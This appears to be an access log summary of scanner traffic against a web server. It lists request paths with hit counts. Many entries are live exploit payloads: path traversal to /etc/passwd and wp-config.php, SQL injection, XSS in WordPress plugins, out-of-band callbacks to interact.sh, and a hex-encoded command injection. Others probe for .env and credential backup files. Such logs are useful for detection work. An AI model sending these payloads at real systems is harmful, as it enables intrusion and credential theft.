1 | GET | /user.php?mod=login |
HTTP/1.1 |
1 | GET | /user.php |
HTTP/1.1 |
3 | GET | /user/.env.local |
HTTP/1.1 |
3 | GET | /user/.env.staging |
HTTP/1.1 |
3 | GET | /user/.env |
HTTP/1.1 |
1 | GET | /user/0 |
HTTP/1.1 |
1 | GET | /user/1 |
HTTP/1.1 |
1 | GET | /user/2 |
HTTP/1.1 |
1 | GET | /user/3 |
HTTP/1.1 |
1 | GET | /user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2LNn6CfoqxXlZok6q7hhGxqsY9Y')),2-- |
HTTP/1.1 |
1 | GET | /user/login.php |
HTTP/1.1 |
1 | GET | /user/login?redirect=%2F |
HTTP/1.1 |
3 | GET | /user/login |
HTTP/1.1 |
1 | GET | /user/main |
HTTP/1.1 |
1 | GET | /user/scripts/login_par.js |
HTTP/1.1 |
1 | GET | /user/sign_up |
HTTP/1.1 |
1 | GET | /user_secrets.yml |
HTTP/1.1 |
2 | GET | /user |
HTTP/1.1 |
1 | GET | /userportal/webpages/myaccount/login.jsp |
HTTP/1.1 |
1 | GET | /users.sql |
HTTP/1.1 |
2 | GET | /users/login |
HTTP/1.1 |
5 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /uwsgi.ini |
HTTP/1.1 |
1 | GET | /v1.24/version |
HTTP/1.1 |
1 | GET | /v1/auth/users?pageNo=1&pageSize=9 |
HTTP/1.1 |
1 | GET | /v1/kv/2LNn5bC184DIrROniVBP4UyCqcv%253Fraw |
HTTP/1.1 |
4 | GET | /v1/metadata/private-networks |
HTTP/1.1 |
1 | GET | /v1/metadata |
HTTP/1.1 |
1 | GET | /v1/submissions |
HTTP/1.1 |
1 | GET | /v1/tasks |
HTTP/1.1 |
1 | GET | /v2/_catalog |
HTTP/1.1 |
1 | GET | /v2/keys/ |
HTTP/1.1 |
1 | GET | /v3/settings/first-login |
HTTP/1.1 |
1 | GET | /var/resource_config.json |
HTTP/1.1 |
2 | GET | /var |
HTTP/1.1 |
1 | GET | /vcac/?original_uri=http[:]//13[.]67[.]44[.]234%2Fvcac |
HTTP/1.1 |
1 | GET | /vcac/ |
HTTP/1.1 |
1 | GET | /vendor/webmozart/assert/.composer-auth.json |
HTTP/1.1 |
1 | GET | /ventrilo_srv.ini |
HTTP/1.1 |
1 | GET | /versa/app/img/versa-logo.png |
HTTP/1.1 |
3 | GET | /versa/login.html |
HTTP/1.1 |
1 | GET | /versa/login |
HTTP/1.1 |
3 | GET | /version |
HTTP/1.1 |
1 | GET | /view/viewer_index.shtml |
HTTP/1.1 |
1 | GET | /views/ajax/autocomplete/user/a |
HTTP/1.1 |
2 | GET | /virtualems/Login.aspx |
HTTP/1.1 |
2 | GET | /visualrf/group_list.xml?aps=1&end=500&match&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /vpn/../vpns/cfg/smb.conf |
HTTP/1.1 |
1 | GET | /wabam/favicon.ico |
HTTP/1.1 |
1 | GET | /wabam |
HTTP/1.1 |
2 | GET | /wan.htm |
HTTP/1.1 |
1 | GET | /wavemaker/studioService.download?inUrl=file///etc/passwd&method=getContent |
HTTP/1.1 |
1 | GET | /wd/hub |
HTTP/1.1 |
1 | GET | /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /web-console/ServerInfo.jsp |
HTTP/1.1 |
1 | GET | /web.config.i18n.ashx?l=nuclei&v=nuclei |
HTTP/1.1 |
2 | GET | /web.config |
HTTP/1.1 |
3 | GET | /web/.env.local |
HTTP/1.1 |
3 | GET | /web/.env.production |
HTTP/1.1 |
3 | GET | /web/.env.staging |
HTTP/1.1 |
3 | GET | /web/.env |
HTTP/1.1 |
1 | GET | /web/database/manager |
HTTP/1.1 |
1 | GET | /web/database/selector/ |
HTTP/1.1 |
1 | GET | /web/debug/default/view |
HTTP/1.1 |
2 | GET | /web/home.html |
HTTP/1.1 |
2 | GET | /web/index.html |
HTTP/1.1 |
2 | GET | /web/manifest.json |
HTTP/1.1 |
1 | GET | /web/phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | /web/xml/webuser-auth.xml |
HTTP/1.1 |
1 | GET | /web_shell_cmd.gch |
HTTP/1.1 |
2 | GET | /webacs/pages/common/login.jsp |
HTTP/1.1 |
1 | GET | /webadmin/deny/index.php?cat=1&connectionip=127.0.0.1&dpid=1&dpruleid=1&groupname=<group_name_eg_netsweeper_student_allow_internet_access&nsphostname=netsweeper&policyname=auto_created&ttl=5018400&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&userip=127.0.0.1&username=root |
HTTP/1.1 |
2 | GET | /webadmin/out |
HTTP/1.1 |
1 | GET | /webadmin/pkg?command=<script>alert(document.cookie)</script> |
HTTP/1.1 |
1 | GET | /webadmin/reporter/view_server_log.php?act=stats&count=1&filename=log&filter=0&log=../../../../../../etc/passwd&offset=1&sortorder=0 |
HTTP/1.1 |
2 | GET | /webadmin/reporter/view_server_log.php?act=stats&count=1000&filename&filter&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=1&offset&server=localhost&sortitem&sortorder |
HTTP/1.1 |
1 | GET | /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 |
HTTP/1.1 |
1 | GET | /webapi/v1/system/accountmanage/account |
HTTP/1.1 |
1 | GET | /webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E |
HTTP/1.1 |
1 | GET | /webclient/ |
HTTP/1.1 |
1 | GET | /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 |
HTTP/1.1 |
2 | GET | /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E |
HTTP/1.1 |
1 | GET | /webmail/ |
HTTP/1.1 |
1 | GET | /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini |
HTTP/1.1 |
1 | GET | /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd |
HTTP/1.1 |
2 | GET | /webmail/src/login.php |
HTTP/1.1 |
1 | GET | /webmin/ |
HTTP/1.1 |
1 | GET | /webpack.mix.js |
HTTP/1.1 |
2 | GET | /webshell4/login.php |
HTTP/1.1 |
3 | GET | /website/.env.local |
HTTP/1.1 |
3 | GET | /website/.env.production |
HTTP/1.1 |
3 | GET | /website/.env.staging |
HTTP/1.1 |
3 | GET | /website/.env |
HTTP/1.1 |
1 | GET | /websso/SAML2/SSO/vsphere.local?SAMLRequest |
HTTP/1.1 |
2 | GET | /webstats/awstats.pl |
HTTP/1.1 |
1 | GET | /webtools/control/main |
HTTP/1.1 |
2 | GET | /webui/?file_name=../../../../../../../../../../../../c:/windows/win.ini&g=sys_dia_data_down |
HTTP/1.1 |
2 | GET | /webui/?file_name=../../../../../../../../../../../../etc/passwd&g=sys_dia_data_down |
HTTP/1.1 |
1 | GET | /webui/file_guest?flags=1152&path=/var/www/documentation/../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /webvpn.html |
HTTP/1.1 |
1 | GET | /welcome_webcenter.html |
HTTP/1.1 |
1 | GET | /well-known/apple-app-site-association |
HTTP/1.1 |
1 | GET | /wfc/portal |
HTTP/1.1 |
1 | GET | /wgetrc |
HTTP/1.1 |
7 | GET | /whoAmI/ |
HTTP/1.1 |
1 | GET | /wiki |
HTTP/1.1 |
1 | GET | /wlmeng/../../../../../../../../../../../etc/passwd%2500index.htm |
HTTP/1.1 |
1 | GET | /wlsecurity.html |
HTTP/1.1 |
1 | GET | /wnm/login/login.json |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=7e6ecce2ceb5ebe909eca4aae492e46a |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=859aeb253f75d845974935403a54c28d |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)// |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=directorist_author_pagination |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=easync_success_and_save |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=fetch_posts&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&stream-id=1 |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E&feed=instagram |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_return_url=https[:]//interact[.]sh&admin_custom_language_toggle=1 |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E] |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLmludGVyYWN0LnNo\" |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=shareaholic_debug_info |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22} |
HTTP/1.1 |
2 | GET | /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 |
HTTP/1.1 |
1 | GET | /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php |
HTTP/1.1 |
2 | GET | /wp-admin/admin-post.php?local-destination-id=/etc/passwd&local-download=/etc/passwd&page=pb_backupbuddy_destinations |
HTTP/1.1 |
1 | GET | /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http[:]// |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?format=csv&mec-ix-action=export-events&page=MEC-ix&tab=MEC-export |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?page=download_report&report=users&status=all |
HTTP/1.1 |
1 | GET | /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /wp-admin/index.php |
HTTP/1.1 |
2 | GET | /wp-admin/install.php |
HTTP/1.1 |
1 | GET | /wp-admin/maint/repair.php |
HTTP/1.1 |
1 | GET | /wp-admin/options-general.php?\"></script><script>alert(document.domain)</script>&page=cf7sr_edit |
HTTP/1.1 |
1 | GET | /wp-admin/options.php |
HTTP/1.1 |
1 | GET | /wp-admin |
HTTP/1.1 |
1 | GET | /wp-app.log |
HTTP/1.1 |
1 | GET | /wp-cli.yml |
HTTP/1.1 |
3 | GET | /wp-config%20-%20Copy.php |
HTTP/1.1 |
3 | GET | /wp-config%20copy.php |
HTTP/1.1 |
3 | GET | /wp-config-backup.php |
HTTP/1.1 |
5 | GET | /wp-config-backup.txt |
HTTP/1.1 |
3 | GET | /wp-config-backup1.txt |
HTTP/1.1 |
3 | GET | /wp-config-backup |
HTTP/1.1 |
3 | GET | /wp-config-good |
HTTP/1.1 |
3 | GET | /wp-config-sample.php.bak |
HTTP/1.1 |
4 | GET | /wp-config-sample.php |
HTTP/1.1 |
3 | GET | /wp-config-sample.php~ |
HTTP/1.1 |
3 | GET | /wp-config.ORG |
HTTP/1.1 |
3 | GET | /wp-config.backup |
HTTP/1.1 |
3 | GET | /wp-config.bak |
HTTP/1.1 |
3 | GET | /wp-config.bkp |
HTTP/1.1 |
3 | GET | /wp-config.cfg |
HTTP/1.1 |
3 | GET | /wp-config.conf |
HTTP/1.1 |
3 | GET | /wp-config.data |
HTTP/1.1 |
3 | GET | /wp-config.dump |
HTTP/1.1 |
3 | GET | /wp-config.good |
HTTP/1.1 |
3 | GET | /wp-config.htm |
HTTP/1.1 |
3 | GET | /wp-config.html |
HTTP/1.1 |
4 | GET | /wp-config.inc |
HTTP/1.1 |
3 | GET | /wp-config.local.php |
HTTP/1.1 |
3 | GET | /wp-config.old.old |
HTTP/1.1 |
4 | GET | /wp-config.old |
HTTP/1.1 |
3 | GET | /wp-config.orig |
HTTP/1.1 |
3 | GET | /wp-config.original |
HTTP/1.1 |
3 | GET | /wp-config.php- |
HTTP/1.1 |
8 | GET | /wp-config.php-backup |
HTTP/1.1 |
3 | GET | /wp-config.php-bak |
HTTP/1.1 |
3 | GET | /wp-config.php-n |
HTTP/1.1 |
3 | GET | /wp-config.php-o |
HTTP/1.1 |
3 | GET | /wp-config.php-old |
HTTP/1.1 |
3 | GET | /wp-config.php-original |
HTTP/1.1 |
3 | GET | /wp-config.php-save |
HTTP/1.1 |
3 | GET | /wp-config.php-work |
HTTP/1.1 |
3 | GET | /wp-config.php.0 |
HTTP/1.1 |
3 | GET | /wp-config.php.1 |
HTTP/1.1 |
3 | GET | /wp-config.php.2 |
HTTP/1.1 |
3 | GET | /wp-config.php.3 |
HTTP/1.1 |
3 | GET | /wp-config.php.4 |
HTTP/1.1 |
3 | GET | /wp-config.php.5 |
HTTP/1.1 |
3 | GET | /wp-config.php.6 |
HTTP/1.1 |
3 | GET | /wp-config.php.7 |
HTTP/1.1 |
3 | GET | /wp-config.php.8 |
HTTP/1.1 |
3 | GET | /wp-config.php.9 |
HTTP/1.1 |
3 | GET | /wp-config.php.a |
HTTP/1.1 |
3 | GET | /wp-config.php.aws |
HTTP/1.1 |
3 | GET | /wp-config.php.azure |
HTTP/1.1 |
3 | GET | /wp-config.php.b |
HTTP/1.1 |
3 | GET | /wp-config.php.backup.txt |
HTTP/1.1 |
3 | GET | /wp-config.php.backup |
HTTP/1.1 |
3 | GET | /wp-config.php.bak1 |
HTTP/1.1 |
9 | GET | /wp-config.php.bak |
HTTP/1.1 |
3 | GET | /wp-config.php.bk |
HTTP/1.1 |
3 | GET | /wp-config.php.bkp |
HTTP/1.1 |
3 | GET | /wp-config.php.c |
HTTP/1.1 |
3 | GET | /wp-config.php.com |
HTTP/1.1 |
3 | GET | /wp-config.php.cust |
HTTP/1.1 |
3 | GET | /wp-config.php.dev |
HTTP/1.1 |
3 | GET | /wp-config.php.disabled |
HTTP/1.1 |
5 | GET | /wp-config.php.dist |
HTTP/1.1 |
3 | GET | /wp-config.php.dump |
HTTP/1.1 |
5 | GET | /wp-config.php.html |
HTTP/1.1 |
3 | GET | /wp-config.php.in |
HTTP/1.1 |
4 | GET | /wp-config.php.inc |
HTTP/1.1 |
3 | GET | /wp-config.php.local |
HTTP/1.1 |
3 | GET | /wp-config.php.maj |
HTTP/1.1 |
3 | GET | /wp-config.php.new |
HTTP/1.1 |
8 | GET | /wp-config.php.old |
HTTP/1.1 |
3 | GET | /wp-config.php.org |
HTTP/1.1 |
5 | GET | /wp-config.php.orig |
HTTP/1.1 |
3 | GET | /wp-config.php.original |
HTTP/1.1 |
3 | GET | /wp-config.php.php-bak |
HTTP/1.1 |
3 | GET | /wp-config.php.prod |
HTTP/1.1 |
3 | GET | /wp-config.php.production |
HTTP/1.1 |
3 | GET | /wp-config.php.sample |
HTTP/1.1 |
3 | GET | /wp-config.php.save.1 |
HTTP/1.1 |
4 | GET | /wp-config.php.save |
HTTP/1.1 |
3 | GET | /wp-config.php.stage |
HTTP/1.1 |
3 | GET | /wp-config.php.staging |
HTTP/1.1 |
3 | GET | /wp-config.php.swn |
HTTP/1.1 |
3 | GET | /wp-config.php.swo |
HTTP/1.1 |
7 | GET | /wp-config.php.swp |
HTTP/1.1 |
3 | GET | /wp-config.php.tar |
HTTP/1.1 |
3 | GET | /wp-config.php.temp |
HTTP/1.1 |
3 | GET | /wp-config.php.tmp |
HTTP/1.1 |
4 | GET | /wp-config.php.txt |
HTTP/1.1 |
3 | GET | /wp-config.php.uk |
HTTP/1.1 |
3 | GET | /wp-config.php.us |
HTTP/1.1 |
3 | GET | /wp-config.php1 |
HTTP/1.1 |
3 | GET | /wp-config.php= |
HTTP/1.1 |
3 | GET | /wp-config.php_1 |
HTTP/1.1 |
3 | GET | /wp-config.php______ |
HTTP/1.1 |
3 | GET | /wp-config.php__ |
HTTP/1.1 |
3 | GET | /wp-config.php__olds |
HTTP/1.1 |
3 | GET | /wp-config.php_ |
HTTP/1.1 |
3 | GET | /wp-config.php_backup |
HTTP/1.1 |
3 | GET | /wp-config.php_bak |
HTTP/1.1 |
3 | GET | /wp-config.php_bk |
HTTP/1.1 |
3 | GET | /wp-config.php_new |
HTTP/1.1 |
3 | GET | /wp-config.php_old2017 |
HTTP/1.1 |
3 | GET | /wp-config.php_old2018 |
HTTP/1.1 |
3 | GET | /wp-config.php_old2019 |
HTTP/1.1 |
3 | GET | /wp-config.php_old2020 |
HTTP/1.1 |
3 | GET | /wp-config.php_old |
HTTP/1.1 |
5 | GET | /wp-config.php_orig |
HTTP/1.1 |
3 | GET | /wp-config.php_original |
HTTP/1.1 |
4 | GET | /wp-config.php |
HTTP/1.1 |
3 | GET | /wp-config.phpa |
HTTP/1.1 |
3 | GET | /wp-config.phpb |
HTTP/1.1 |
3 | GET | /wp-config.phpbak |
HTTP/1.1 |
3 | GET | /wp-config.phpc |
HTTP/1.1 |
3 | GET | /wp-config.phpd |
HTTP/1.1 |
3 | GET | /wp-config.phpn |
HTTP/1.1 |
3 | GET | /wp-config.phpnew |
HTTP/1.1 |
3 | GET | /wp-config.phpold |
HTTP/1.1 |
3 | GET | /wp-config.phporiginal |
HTTP/1.1 |
3 | GET | /wp-config.phptmp |
HTTP/1.1 |
5 | GET | /wp-config.php~ |
HTTP/1.1 |
3 | GET | /wp-config.php~~~ |
HTTP/1.1 |
3 | GET | /wp-config.prod.php.txt |
HTTP/1.1 |
3 | GET | /wp-config.save |
HTTP/1.1 |
3 | GET | /wp-config.tar |
HTTP/1.1 |
3 | GET | /wp-config.temp |
HTTP/1.1 |
5 | GET | /wp-config.txt |
HTTP/1.1 |
3 | GET | /wp-config.zip |
HTTP/1.1 |
3 | GET | /wp-config_backup |
HTTP/1.1 |
3 | GET | /wp-config_good |
HTTP/1.1 |
3 | GET | /wp-config |
HTTP/1.1 |
3 | GET | /wp-configbak |
HTTP/1.1 |
3 | GET | /wp-config~ |
HTTP/1.1 |
1 | GET | /wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1 |
HTTP/1.1 |
2 | GET | /wp-content/backups-dup-lite/tmp/ |
HTTP/1.1 |
1 | GET | /wp-content/backups-dup-lite |
HTTP/1.1 |
2 | GET | /wp-content/bps-backup/logs/db_backup_log.txt |
HTTP/1.1 |
1 | GET | /wp-content/debug.log |
HTTP/1.1 |
1 | GET | /wp-content/dup-installer/main.installer.php?is_daws=1 |
HTTP/1.1 |
1 | GET | /wp-content/force-download.php?file=../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/mysql.sql |
HTTP/1.1 |
1 | GET | /wp-content/plugins/.git/config |
HTTP/1.1 |
1 | GET | /wp-content/plugins/1-flash-gallery/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/123contactform-for-wordpress/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/activehelper-livehelp/server/offline.php?BCC=BCC&COMPANY=COMPANY&COMPLETE=COMPLETE&DOMAINID=DOMAINID&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PHONE=PHONE&SECURITY=SECURITY&SERVER=SERVER&TITLE=TITLE&URL=URL |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 |
HTTP/1.1 |
2 | GET | /wp-content/plugins/adaptive-images/adaptive-images-script.php/%253Cimg/src/onerror=alert%28document.domain%29%253E/?debug=true |
HTTP/1.1 |
1 | GET | /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/arforms/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js |
HTTP/1.1 |
1 | GET | /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/avchat-3/index_popup.php?FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/boldgrid-backup/cron/restore-info.json |
HTTP/1.1 |
1 | GET | /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/brandfolder/callback.php?wp_abspath=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/canto/includes/lib/detail.php?subdomain |
HTTP/1.1 |
1 | GET | /wp-content/plugins/canto/includes/lib/get.php?subdomain |
HTTP/1.1 |
1 | GET | /wp-content/plugins/canto/includes/lib/tree.php?subdomain |
HTTP/1.1 |
2 | GET | /wp-content/plugins/checklist/images/checklist-icon.php?fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php |
HTTP/1.1 |
2 | GET | /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json |
HTTP/1.1 |
2 | GET | /wp-content/plugins/constant-contact-forms/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json |
HTTP/1.1 |
1 | GET | /wp-content/plugins/contact-form-7/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/dzs-zoomsounds/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/easy-media-gallery-pro/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/easy-wp-smtp/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/elementor/assets/js/frontend.min.js |
HTTP/1.1 |
1 | GET | /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 |
HTTP/1.1 |
2 | GET | /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb |
HTTP/1.1 |
1 | GET | /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php |
HTTP/1.1 |
2 | GET | /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
